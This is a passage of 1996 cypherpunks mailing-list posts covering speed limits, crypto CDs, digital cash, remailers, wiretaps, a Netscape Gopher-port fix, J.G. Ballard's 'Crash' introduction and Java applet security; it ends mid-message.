"This is cypherpunks. Not Cable-TV-Piracy-Punks."

Cable-TV-Piracy-Punks?  Who's this guy?  I asked for a text file (for 
informational purposes of course).  Oh and David K. Merriman, PPV is 
not on cable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chevelle <love5683@voicenet.com>
Date: Fri, 29 Mar 1996 21:58:07 +0800
To: "Deven T. Corzine" <deven@ties.org>
Subject: Re: National speed limits and expansion of federal power...
Message-ID: <199603290134.UAA23638@mail.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


 let me tell ya' I live in Central Texas and regularly use I-35, which was
the primary highway considerd for the bill. The speed limits were raised to
75 mph at increments of every 4 to 5 miles. By that I mean the minute you
pass the sign that says 75 with good eyes you can see the one up ahead that
says 65 or 55 and you might even catch a glimpse of the state trooper parked
beside it. I personally think its a joke and an inconvience, I was totally
for the the bill as it was stated but this "red light, green light" game is
very disapointing. Just goes to show the government still can't do anything
right.

                                        Chevelle out....
At 06:52 PM 3/28/96 -0500, Deven T. Corzine wrote:
>At 06:06 PM 3/27/96 -0500, Deven T. Corzine wrote:
>>Actually, the national government didn't even *pretend* it had jurisdiction
>>here.  Instead, they used an indirect approach -- they passed laws which
>>denied some of the existing highway funding to states with higher speed
>>limits than 55 MPH.  (Later this limit was raised to 65 MPH, given some
>>additional restrictions such as proximity to population centers.)
>
>At 03:12 AM 3/28/96 -0500, Chevelle wrote:
>>It was only months ago that they passed a bill raising alot of speed limits
>>to the 75mph range.
>
>To be precise, Congress repealed the laws which had pressured states into the
>55/65 MPH speed limits.  Once this happened, a number of states either took
>advantage of it immediately to raise speed limits, or are considering it...
>Other states don't intend to raise the limits.  In Montana, you can now drive
>at *any* speed legally, in the daytime.  So if you want to go 100 MPH, head to
>Montana...  :-)
>
>Deven
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Sat, 30 Mar 1996 19:53:06 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
Message-ID: <960328203626.20200293@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


>Thoughtful comments, so I'll comment on Henry's comments:
>At 6:10 PM 3/27/96, Henry Huang wrote:
>
>>I'd argue that having a slightly out-of-date CD-ROM is better than nothing,
>>because:
>>
>>- It gives you an idea of what sorts of crypto applications are out there,
>
>True, but your later point about who the intended market is makes the point
>I was making: the likeliest users pretty much know what they want and snarf
>the most recent (and debugged) version off the Net. (I have little
>interest, speaking as a user, in the zillions of variants of CryptDisk and
>SmartCrypt and whatnot that get mentioned here....I really only want
>"MacPGP" in its latest version, at this time, and for this the Web is
>certainly fast enough for me.)
>
>And I suspect I am not that unusual. The faster access to a CD-ROM is not
>too useful to most, as the time to install, learn, use, etc. a new crypto
>program is many orders of magnitude greater than getting it by even a 14.4
>modem.
>
	What I see most useful in the CDs I burned last fall for personal
use is not just having access to the latest executables, but to have access
to trusted source code. Just as it is nice to have Appl. Crypt. disk, it
is -for me- to have sources for many interesting things around. I can then
study any of them, pick a piece, get whatever at any moment without having
to surf the net.

	Hey, I just got Appl. Crypt. 2nd Ed. yesterday. Meanwhile with 
the 1st Ed. and the code I had in my CDs I could very well manage with
most things, protocols, algorithms... Of course, the version of Crypto++
I have there is outdated now, but the algorithms are still valid, and
I still have much more algorithms there than the current version has, and
I can always plug in or adapt a new one should I need to.

	Yes, I can always go to the Net for the latest sources when I
need them, but when I don't, it's easier for me to go to my CD (but I
have it always at hand over my desk).

	Still, the main problem I see is that users should have to trust
the authors of such CD. Of course I trust myself and I had already reviewed
most of the code I stored -or verified it somehow- and so my CD is good
for me. But a good crypto "aficionado" should seriously consider whether
to trust any executables (hell, any net-aficionado should think the same
about Java applets, but that's another story).

	That reduces the interest of the CD to those who want source
code to work with or to analyze. Or at least those savvy enough to use
a compiler and possibly study source code. Unless someone stands behind
the CD to assert its truthfulness.

	I may -or not- trust the people at unimi, but would I also trust
a lot of intermediate people putting up together a CD-ROM? For that sake,
and considering the costs of storage and removable storage media, I'd
bet many people would find more useful to download their copies from
the net (even once a year only) as I did.

	It's a nice idea though. If well put together and done, it could
help raise concern and access to cryptography to the average user. In this
case, many crypto programs, shells and so would be bundled with samples and
say, exercises, for average people to play with. Well done, many teens
would play with it, and possibly many serious users. A good documentation
set explaining in plain terms what each package does, its good and bad
points, and comparing it with similar packages both for the savvy and
the merely curious would round up the bundle.

	I'd like to imagine such a CD distributed with a popular magazine
(PCworld for example)and many kids playing "spy vs. spy" with their
friends, trying simple algorithms and corresponding cracking programs,
discovering which are best and which ar not... And possibly serious
adults studying the reports and playing too, cracking their WP files,
discovering how good PKZIP crypto is, and moving on to PGP and other
systems... Descriptive plays for mimicking simple protocols and attacks
with real world roll games and then with the computer. All guided by a 
nice tutorial with references to more technical reports for the interested. 
Maybe with several levels of explanations up to real crypto stuff and 
source code.

	But you won't find all that on any current archive. And writing all
the additional stuff, together with compiling for several platforms, and
rearranging information for a rational organization (not just a mirror)
is quite a *lot* of work.

	That could pretty well be Applied Cryptography Nth Online Edition.

	Oh well, I don't lose anything by dreaming.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 22:49:04 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <ad8095cb33021004495e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 PM 3/28/96, Alan Horowitz wrote:
>Certainly, I believe TCM's proposition that there is no "economic need"
>for an American to learn a second language.
>
>On the other hand, I haven't seen any demonstration of the "value" of
>learning history. Yet, who would argue that ignorance of history is a
>good policy to follow?

Bad analogy. Studying a combination of world history and one's nation's
history is an obvious thing to do. And good bang for the buck.

Choosing a language is a much harder proposition. No single language stands
out for most Westerners, at least not nearly as much as it once did. (Or
one of several "top pick" languages, e.g., German, French, and Spanish.)

My last word on this language topic will be this: far from being a closed,
ignorant, immigrant-hating, shit-eating nation, as some of the usual
America bashers have intimated, the decline of language skills reflects a
decline in the "ethnocentrism" of the past. A few decades ago, one studied
German to be a scientist, one studied French to be cultured, one studied
Latin for unexplained reasons (just a joke), and one studied Spanish if not
one of the others.

As immigrant waves entered the U.S., and as the anti-Westernism meme spread
amongst educators, Latin faded out, then German, then French. (All are
still taught, but not in the numbers once seen.)

Given the explosion of languages--Yoruba, Talegu, Tagalog, Russian, Korean,
and on and on--the role of French, German, and to some extent Spanish is
less clear than ever. (Spanish is admittedly a growing language, but not in
technical fields...just a fact.)

So, I am not surprised that American students have no desire to learn one
of these languages. They'll have to search to find people to practice with,
which they won't (on average, not at the 2-sigma point).

While I don't deny the niceness of knowing Russian or Korean, the effort
needed to achieve reasonable proficiency (beyond the simple words Bill
Frantz was talking about....this thread is about actually learning a
language, not a handful of phrases!) is not worth, in my opinion and that
apparently of many others, the effort.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Miron <miron@miron.vip.best.com>
Date: Sat, 30 Mar 1996 04:15:41 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE: remail@extropia moves
Message-ID: <199603290238.VAA09647@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

My remailer moved from:

	remail@extropia.wimsey.com

to:
	remail@miron.vip.best.com

Please adjust your pointers accordingly.  Mail through extropia
should be forwarded for the next few days.  There is no change
to the encryption key.

	Miron




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 30 Mar 1996 15:35:25 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199603290555.VAA24804@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:25 PM 3/28/96 -0500, Black Unicorn <unicorn@schloss.li> wrote:
[a bunch of mostly correct things, except for]
>But instead of backing in gold, or some tangible asset, dcash is still 
>ultimately backed by the full faith and credit of the government who's 
>currency the dcash is denominated in.

Well, after dealing with the full faith and credit of the issuing bank,
you may acquire some pieces of paper which are backed by the dubious
faith, credit, and reputation of some government.  As you later say,

>it is still just a second tier bearer instrument.

>I think that the diet coke backed cash I tried to promote back when was 
>closer to a "currency" than d/ecash issued by a bank and drawable on 
>government currency.  (Maybe this is why no one was interested?)

I've used coffee-based currency, backed by my co-worker Joe.
Worked fine, and excess profits usually got turned into bagels and donuts.

>Real solid ecash, and the kind of cash I would like to see out there, 
>would be limited to a non-dilutable one time issuance and backed in some 
>precious commodity held on reserve.  A closed-ended share of a stock of 
>gold, for instance.  That would require no intermediation of a "currency" 
>based on the full faith and credit of an issuing sovereign.

Most of my money is usually in banks, where it exists as bits in a ledger
rather than as government-backed paper; my credit union at least has
private insurance in addition to the government insurance, so there's
someone honest backing the bank, even though it's only denominated in fiats.
Digicash of various sorts may be able to get some political support if
some bank wants to issue accounts denominated in ECUs, though ultimately
the issue isn't whether it's backed by governments, gold, or insurance agents,
but whether someone's willing to give you stuff for it when you want stuff.
If you're buying physical stuff, you're probably buying from someone nearby,
so it's usually useful to be able to _pay_ in local-flavored currency.
In Europe, "local" may include the currencies of several nearby countries;
in the US lower-48, that usually means US dollars, since Canadians will
usually take them and Mexican pesos can be trusted to devalue rapidly.

ObLinguaPunk: One cypherpunk-relevant use for speaking foreign languages
is that you sometimes need to speak local-talk long enough to find an
Internet connection when you've boogied overseas to retire on your digicash
earnings or run your consulting business to make the big bucks before
you go rent a cabin in Nevada from some Panamanian corporation that's
owned by several Caribbean bank accounts....
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281

1995: Chat rooms, espresso, and Linux
1996: Exon, melatonin, and Java.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Beardsley <dgbeards@southern.edu>
Date: Fri, 29 Mar 1996 23:20:34 +0800
To: cypherpunks@toad.com
Subject: QuickBooks file format
Message-ID: <199603290411.XAA03370@southern.edu>
MIME-Version: 1.0
Content-Type: text/plain


I would like to get information about how the QuickBooks accounting program
by Intuit stores its data files.  I also would like to know what it does
with the passwords and how it encrypts the files. (If it even encrypts them)
If you have any of this information or know where I can find it I would
really appreciate it.  Thanks in advance to any replies.

Doug Beardsley
dgbeards@southern.edu
KE4ZPI

Committees:  Where minutes are kept and hours are lost





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 29 Mar 1996 16:50:28 +0800
To: cypherpunks@toad.com
Subject: Re: PPV Descrambler (fwd)
Message-ID: <199603290523.XAA14754@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> 
> "This is cypherpunks. Not Cable-TV-Piracy-Punks."
> 
> Cable-TV-Piracy-Punks?  Who's this guy?  I asked for a text file (for 
> informational purposes of course).  Oh and David K. Merriman, PPV is 
> not on cable.
> 

Video Scrambling & Descramblin for Satellite & Cable TV
R.F. Graf & W. Sheets
ISBN 0-672-22499-2
$31.95

PPV is on the Austin, TX cable systems. Several varieties even.



 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 30 Mar 1996 01:59:00 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603290803.AAA06737@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:43 PM 3/27/96 -0500, Shabbir J. Safdar wrote:
> Your misunderstanding of how interceptions are done is dangerous to
> what is otherwise a rational, intelligent argument.  
>
> Indeed, there are ways to conduct a wiretap without a judge.  They require
> dispensations from people like the Attorney General, for example.  And
> this is certainly not a normal practice.

I suggest that you study arithmetic before pontificating on normal government
practice:

1% of all phone capacity = 850 wiretaps a year.  Yeah, right.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jeff@BlackMagic.Com (Jeff)
Date: Sat, 30 Mar 1996 19:47:03 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199603290536.AAA12695@Molasar.blackmagic.com>
MIME-Version: 1.0
Content-Type: text/plain



  Regarding "What backs up digital currency/cash", a hypothetical situation
  just to see what you guys think.  Can this happen ?  I honestly have my
  doubts, mostly I see logistical problems (finding a mechanism, etc, if
  you recall my mini-rant just a few days ago).  Anyway, these are some of
  the things I honestly feel would have to happen for a true Internetwork
  currency to take off, if that's even possible.

  Situation 1-

  You're a company, "Bug Boy Video" (my apologies to the real Bug Boy Video
  if it exists).  This national video chain decides to get involved on the
  net and sees that there is a token standard- they figure they can get
  people to visit their website by offering a "web hunt".  Anybody who can
  solve any of the puzzles gets a token worth, say, a free video, a 19.99$US
  value- just redeem the token.

    Token Backing-- 19.99$US video from Bug Boy

  Situation 2-

  You're a bank, "1st Netherworld".  You use the same token system to make
  digital coins worth a penny each and issue them to your customers in
  exchange for 0.01$US - only to account holders of course.  Now you have
  the "real money" to invest while the users of the system store and
  transfer these tokens around the net to each other (in reality I guess you
  use a net-cheque ?)

    Token Backing-- 0.01$US with 1st Netherworld

  Situation 3-

  You're a mining operation, "Money Pit".  Your product is gold and silver
  refined to be 99.99% pure (24K in gold).  You decide to issue some tokens
  on the net worth an ounce of gold and another kind of token worth an oz
  of silver.  Some would call you a total nut corp, but they don't call you
  Money Pit for nothin.

    Token Backing-- 1 oz silver (approximately 7$US?) with Money Pit.
                    1 oz gold (approximately 490$US?) with Money Pit.

  Situation 4-

  Some group of hackers, "BizHack", decide to issue a private currency
  among themselves for the purposes of trading vulnerability information,
  services, etc.  They come up with a standard, "an hour of work", and
  someone runs the bank.  Anyone with currency can use it to buy goods
  and services from anyone who will accept the money.

    Token Backing-- 1 hour of service from a BizHacker.

  Situation 5-

  A bunch of kids on the net play this game, "Tragic: The Addiction", and
  they use rec.games.trading-cards.marketplace.tragic.sales to do their
  trading.  Somebody gets the keen idea to set up a "holding company" that
  people can send their cards to and get a "token" out that represents
  the Tragic: card.  They trade these tokens on the net until someone wants
  to redeem his/her "Black Lilly" token in for the real card that it
  represents.  Some sort of redemption charge applies, of course.

    Token Backing-- Tragic: cards with holding company.

  Situation 6-

  You're a beer manufacturer, "Smart Foam", and decide to skip all the
  market middlemen and sell stock directly on the Internet.  You set up
  your super-keen promo page and users buy stock directly from you.  Now
  you hear about this other company that is doing electronic transfers
  of stocks on the internet in the token system, each stock represented
  by a single token.  People trade them at will.  You suggest to your
  buyers that they might want to look at the system as a way of trading
  your stock and offer to send the buyers stock directly to the exchange
  so it can be withdrawn by the buyer as tokens.  As a beer brewery, we
  don't want to get in trouble with the SEC for offering the trading
  place for our own stock, we'll let somebody else have the liability.

    Token Backing-- One share of "Smart Foam" stock.

  Situation 7- (doubtful)

  You're running an exchange where people can send stock certificates to
  a third party bank and you'll mint them a token that represents that
  piece of stock so that it can be traded freely on the Internet.  Your
  clients use your non-anonymous system so that trades can be tracked
  and reported, you make a few bucks at registration time, but don't
  charge for transfers (to cut out the brokers).  You deal with the SEC
  directly to make sure all the exchange rules are being followed to the
  letter, and make the service as user friendly as possible- you are a
  place that people come to trade, a market square as it were.

    Token Backing-- A share of common stock in a particular company.

  Situation 8- (the "big mental leap")

  You set up a market square for tokens.  In this online place the users
  can offer tokens for sale to the general public (other users) and the
  service acts as an "escrow" so that both parties have to make their
  transfers through the service.  You track "prices" of the tokens, maybe
  users are on average trading 1 BizHacker token for 2 Bug Boys.  Some
  sort of "trend" starts to emerge at your market.  This BIG LIGHT comes
  on inside your head and you decide to issue your OWN token, this token
  is based on the MARKET VALUE of all the tokens that are traded at your
  exchange.  You call them "market credits" and you "sell" them on your
  own market.

    Token Backing-- One market credit equals 1.5 BizHackers
                                      equals .5 Bug Boys
                                      equals 4 silver Money Pits
                                      equals etc, etc, etc ...
                                      the value changes constantly.

  Market tokens have now taken on a new characteristic, that they are
  going to be accepted much more widely because they can be used to
  purchase many more goods and services, they are accepted in the market
  which you have provided.

  Situation 9-

  Other people see how cool your market is going and decide to set up some
  of their own.  These markets have their own clients, tokens backed by
  everything from stock, state currency, services, pizza coupons, car wash
  tokens, and Darla's special backrub tokens (worth 2 gold Money Pits each!)
  The bright idea pops up in somebodies head to link a few of these markets
  together and .... the rest is future.

  Followup- There are a lot of "trust" assumptions in this, but in the end
  the market always sorts things out.  That's not to say a few people won't
  be holding valueless tokens on occasion or that people won't figure out
  ways to hurt the system, but thus is real life.  Internet economy won't
  come from the top down, it'll come from little bits of trust that build
  up between people who do business together-- it'll come from that little
  group of consultants issuing their own "value tokens" backed by their
  personal service .. when they get together and issue a common currency
  which ALL of them will accept, that currency becomes more widely accepted
  in this new marketplace.  It's in the best interest of everyone involved
  to retain the utmost professionalism when distributing tokens because
  they represent your good name and the name of those who join in.  THIS
  is how trust develops, you can't dream trust up, trust just happens.  An
  exchange fails if people stop trusting it, so they are by nature self-
  governing entities.

  Global currencies and Internet economies aside- even if "the big leap"
  above couldn't happen, I'd sure like to see some companies issuing tokens
  like they were gift certificates or coupons, those have good trade value
  if the name is well known (mostly for lack of something better to trade
  with I'm afraid).

  No mechanism can replace trust, trust just is.  You trust the guy that
  fixes your porch because he's the guy you trust to fix your porch.  You
  trust your consultants, your lawyers (maybe not them), and your accountant
  because they are the people you rely on, you just do.

  Anyway, just my 0.02$US/MTB -- Jeff.

-----BEGIN ECASH PAYMENT-----

oLmQgwABR6GgiqCukIFPkIECkIECkIEEkIEBkYQxW3hfkIQxbe1fkIFPkoFAlJQS
snGvr60Cm0Ao6L2429ljPcC9l5SU1HRHyTS1iQ8W058T4A1+OICJq3GQgRCSji4w
MiB0byB0aGUgbmV0koCUgJCBApGEAAAAAJCBAKGguKCrkIIBoZPgKKjPPXvwAl1Y
kQBWxjFKp9zcfoRNDgsodlUqc5Vybk86UXpmsr2C853o6iZ5NPZ+DiZ0gEhooatU
TZPoY016/rmyGspTixn9xievBxMW1FR34tARr6NgzyXyVU4AbxF0k+Ar2uqxO15E
B6pDqYImuoZzUpMnkGo/vjm7k4nod576vB9F5DUSBMPLIeNm7kg6GuVDW0oPOou3
nbpkJ5AM5lItSJLMgsxel7LON6bjitnFHCLYdseV725AjkN49p7VE3SQgQKhoaE=
-----END ECASH PAYMENT-----


-- 
     http://www.blackmagic.com/people/jeff    Simply Be.    SKYDIVE!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 30 Mar 1996 19:30:38 +0800
To: cypherpunks@toad.com
Subject: Re: National speed limits and expansion of federal power...
Message-ID: <ad80cfbb37021004e5a8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 PM 3/28/96, Deven T. Corzine wrote:

>Other states don't intend to raise the limits.  In Montana, you can now drive
>at *any* speed legally, in the daytime.  So if you want to go 100 MPH, head to
>Montana...  :-)

Ah, Montana! Home of the Freemen, home of the Senator with the new crypto
bill, home to growing numbers of movie stars (Santa Fe having gotten too
crowded), and where you can piss into the rivers and drive as fast as you
want. Guns, too.

(And the guy who hired me at Intel lo those many years ago is now expanding
his ranch in Montana...something like 30,000 acres, last I heard.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 30 Mar 1996 03:21:40 +0800
To: cypherpunks@toad.com
Subject: Netscape 2.01 fixes server vulnerabilities by breaking the client...
Message-ID: <Pine.SUN.3.92.960329011606.6636A-100000@elaine19.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Now I suppose they'll want me to fix all the pages where I do a finger
with a gopher://host:79/0user. Any chance this nonfix can be unfixed?

This nonfix was applied to the UNIX and Win32 versions; I haven't checked
the other platforms.

-rich

>From http://home.netscape.com/eng/mozilla/2.01/relnotes/unix-2.01.html
>go to the security stuff and find:
>
>     * Relating to Ports:
>
>       2.01 fixes a problem where it was possible for a Gopher URL to be
>       used to send commands to ports other than those that were
>       reasonable for the Gopher service. It was possible that this
>       feature could be used to exploit other security vulnerabilities
>       behind firewalls. Navigator 2.01 fixes this problem by limiting
>       the ports that a Gopher URL can access and by disallowing certain
>       control characters in a valid Gopher URL.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nCognito <ncognito@gate.net>
Date: Sat, 30 Mar 1996 00:32:26 +0800
To: cypherpunks@toad.com
Subject: Crash
Message-ID: <199603290840.DAA03640@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


           Introduction to the French Edition of "Crash"

                         J.G.Ballard, 1974


The marriage of reason and nightmare which has dominated the 20th century
has given birth to an ever more ambiguous world.  Across the communications
landscape move the specters of sinister technologies and the dreams that
money can buy.  Thermonuclear weapons systems and soft drink commercials
coexist in an overlit realm ruled by advertising and pseudoevents, science
and pornography.  Over our lives preside the great twin leitmotifs of the 
20th century - sex and paranoia.  Despite McLuhan's delight in high-speed
information mosaics we are still reminded of Freud's profound pessimism in
"Civilization and its Discontents".  Voyeurism, self-disgust, the infantile
basis of our dreams and longings - these diseases of the psyche have now
culminated in the most terrifying casualty of the century:  The death of
affect.

This demise of feeling and emotion has paved the way for all our most real
and tender pleasures - in the excitements of pain and mutilation; in sex
as the perfect arena, like a culture bed of sterile pus, for all the
veronicas of our own perversions; in our moral freedom to pursue our own
psychopathology as a game; and in our apparently limitless powers for
conceptualization - what our children have to fear is not the cars on the
highways of tomorrow but our own pleasure in calculating the most elegant
parameters of their deaths.

To document the uneasy pleasures of living within this glaucous paradise
has more and more become the role of science fiction.  I firmly believe
that science fiction, far from being an unimportant minor offshoot, in fact
represents the main literary tradition of the 20th century, and certainly
its oldest - a tradition of imaginative response to science and technology
that runs in an intact line through H.G. Wells, Aldous Huxley, the writers
of modern American science fiction, to such present-day innovators as 
William Burroughs.

The main "fact" of the 20th century is the concept of the unlimited
possibility.  This predicate of science and technology enshrines the notion
of a moratorium on the past - the irrelevancy and even death of the past - 
and the limitless alternatives available to the present.  What links the 
first flight of the Wright brothers to the invention of the Pill is the
social and sexual philosophy of the ejector seat.

Given this immense continent of possibility, few literatures would seem
better equipped to deal with their subject matter than science fiction.
No other form of fiction has the vocabulary of ideas and images to deal
with the present, let alone the future.  The dominant characteristic of
the modern mainstream novel is its sense of individual isolation, its mood
of introspection and alienation, a state of mind always assumed to be the
hallmark of the 20th century consciousness.

Far from it.  On the contrary, it seems to me that this is a psychology
that belongs entirely to the 19th century, part of a reaction against the
monolithic character of Victorianism and the tyranny of the paterfamilias,
secure in his financial and sexual authority.  Apart from its marked 
retrospective bias and its obsession with the subjective nature of
experience, its real subject matter is the rationalization of guilt and
estrangement.  Its elements are introspection, pessimism and sophistication.
Yet if anything befits the 20th century it is optimism, the iconography of
mass merchandising, naivety and a guilt-free enjoyment of all the mind's
possibilities.

The kind of imagination that now manifests itself in science fiction is not
something new.  Homer, Shakespeare and Milton all invented new worlds to 
comment on this one.  The split of science fiction into a separate and
somewhat disreputable genre is a recent development.  It is connected with
the near disappearance of dramatic and philosophical poetry and the slow
shrinking of the traditional novel as it concerns itself more and more 
exclusively with the nuances of human relationships.  Among those areas 
neglected by the traditional novel are, above all, the dynamics of human
societies (the traditional novel tends to depict society as static), and
man's place in the universe.  However crudely or naively, science fiction 
at least attempts to place a philosophical and metaphysical frame around  
the most important events within our lives and consciousness.

If I make this general defense of science fiction it is, obviously, because
my own career as a writer has been involved with it for almost 20 years. 
>From the very start, when I first turned to science fiction, I was convinced
that the future was a better key to the present than the past.  At the time,
however, I was dissatisfied with science fiction's obsession with its two
principal themes - outer space and the far future.  As much for emblematic
purposes as any theoretical or programmatic ones, I christened the new 
terrain I wishred to explore INNER SPACE, that psychological domain  
(manifest, for example, in surrealist painting) where the inner world of the 
mind and the outer world of reality meet and fuse.

Science and technology multiply around us.  To an increasing extent they 
dictate the languages in which we speak and think.  Either we use those
languages, or we remain mute.

Yet, by an ironic paradox, modern science fiction became the first casualty
of the changing world it anticipated and helped to create.  The future
envisioned by the science fiction of the 1940s and 1950s is already our past.
Its dominant images, not merely of the first Moon flights and interplanetary
voyages, but of our changing social and political relationships in a world 
governed by technology, now resemble huge pieces of discarded stage scenery.
For me, this could be seen most touchingly in the film "2001: A Space
Odyssey", which signified the end of the heroic period of modern science
fiction - its lovingly imagined panoramas and costumes, its huge set pieces,
remind me of "Gone With the Wind", a scientific pageant that became a kind
of historical romance in reverse, a sealed world into which the hard light
of contemporary reality was never allowed to penetrate.

Increasingly, our concepts of past, present and future are being forced to 
revise themselves.  Just as the past itself, in social and psychological
terms, became a casualty of Hiroshima and the nuclear age (almost by
definition a period where we were all forced to think prospectively), so
in its turn the future is ceasing to exist, devoured by the all-voracious
present, as merely one of those manifold alternatives open to us.  Options
multiply around us, we live in an almost infantile world where any demand,
any possibility, whether for lifestyles, travel, sexual roles and 
identities, can be satisfied instantly.

In addition, I feel that the balance between fiction and reality has changed
significantly in the past decade.  Increasingly their roles are reversed.
We live in a world ruled by fictions of every kind - mass merchandising, 
advertising, politics conducted as a branch of advertising, the instant
translation of science and technology into popular imagery, the increasing
blurring and intermingling of identities within the realm of consumer goods,
the preempting of any free or original imaginative response to experience by
the television screen.  We live inside an enormous novel.  For the writer in
particular it is less and less necessary for him to invent the fictional
content of his novel.  The fiction is already there.  The writer's task is
to invent the reality.

In the past we have always assumed that the external world around us has
represented reality, however confusing or uncertain, and that the inner 
world of our minds, its dreams, hopes, ambitions, represented the realm of
fantasy and the imagination.  These roles too, it seems to me, have been
reversed.  The most prudent and effective method of dealing with the world
around us is to assume that it is a complete fiction - conversely, the one
small node of reality left to us is inside our own heads.  Freud's classic
distinction between the latent and manifest content of the dream, between
the apparent and the real, now needs to be applied to the external world of
so-called reality.

Given these transformations, what is the main task facing the writer?  Can 
he any longer make use of the techniques and perspectives of the traditional
19th century novel, with its linear narrative, its measured cronology, its
consular characters grandly inhabiting their domains within an ample time
and space? Is his subject matter the sources of character and personality
sunk deep in the past, the unhurried inspection of roots, the examination of
the most subtle nuances of social behavior and personal relationships?  Has
the writer still the moral authority to invent  a self-sufficient and self-
enclosed world, to preside over his characters like an examiner, knowing all
the questions in advance?  Can he leave out anything he prefers not to 
understand, including his own motives, prejudices and psychopathology?

I feel myuself that the writer's role, his authority and license to act, has
changed radically.  I feel that, in a sense, the writer knows nothing any
longer.  He has no moral stance.  He offers the reader the contents of his
own head, he offers a set of options and imaginative alternatives.  His role
is that of the scientist, whether on safari or in his laboratory, faced with
a completely unknown terrain or subject.  All he can do is to devise 
hypotheses and test them against the facts.

"Crash" is such a book, an extreme metaphor for an extreme situation, a kit
of desperate measures only for use in an extreme crisis.  If I am right, and
what I have done over the past few years is to rediscover the present for
myself, "Crash" takes up its position as a cataclysmic novel of the present 
day in line with my previous novels of world cataclysm set in the near or 
immediate future - "The Drowned World", "The Drought" and "The Crystal
World".

"Crash", of course, is not concerned with an imaginary disaster, however
imminent, but with a pandemic cataclysm institutionalized in all industrial
societies that kills hundreds of thousands of people each year and injures
millions.  Do we see, in the car crash, a sinister portent of a nightmare
marriage between sex and technology?  Will modern technology provide us with
hitherto undreamed-of means for tapping our own psychopathologies?  Is this
harnessing of our innate perversity conceivably of benefit to us?  Is there
some deviant logic unfolding more powerful than that provided by reason?

Throughout "Crash" I have used the car not only as a sexual image, but as a
total metaphor for man's life in today's society.  As such the novel has
a political role quite apart from its sexual content, but I would still like
to think that "Crash" is the first pornographic novel based on technology.
In a sense, pornography is the most political form of fiction, dealing with
how we use and exploit each other in the most urgent and ruthless way.

Needless to say, the ultimate role of "Crash" is cautionary, a warning 
against that brutal, erotic and overlit realm that beckons more and more 
persuasively to us from the margins of the technological landscape.

				J.G.Ballard, 1974
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sat, 30 Mar 1996 03:18:30 +0800
To: dmacfarlane@zip.sbi.com (David Macfarlane)
Subject: Re: WSJ on Big Java Flaw
In-Reply-To: <9603271351.AA18267@zip_master2.sbi.com>
Message-ID: <199603291255.EAA26954@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


We are doing several things: 

1) continuing a "scrubbing" of the code, to look for holes so we
can fix them

2) listening (really) to all comments about the applet security model
and mechanisms - some people fault the model, others fault
the mechanisms, and I'm interested in all critical feedback and
find it helpful

3) continuing to be committed to source code releases to continue vetting
by internet community

4) working with others in the networking security community to 
design ways to expand the functionality allowed to applets in a secure way

5) working on mechanisms to support signed classes, so that people
will be able to authenticate downloaded code.  Granted
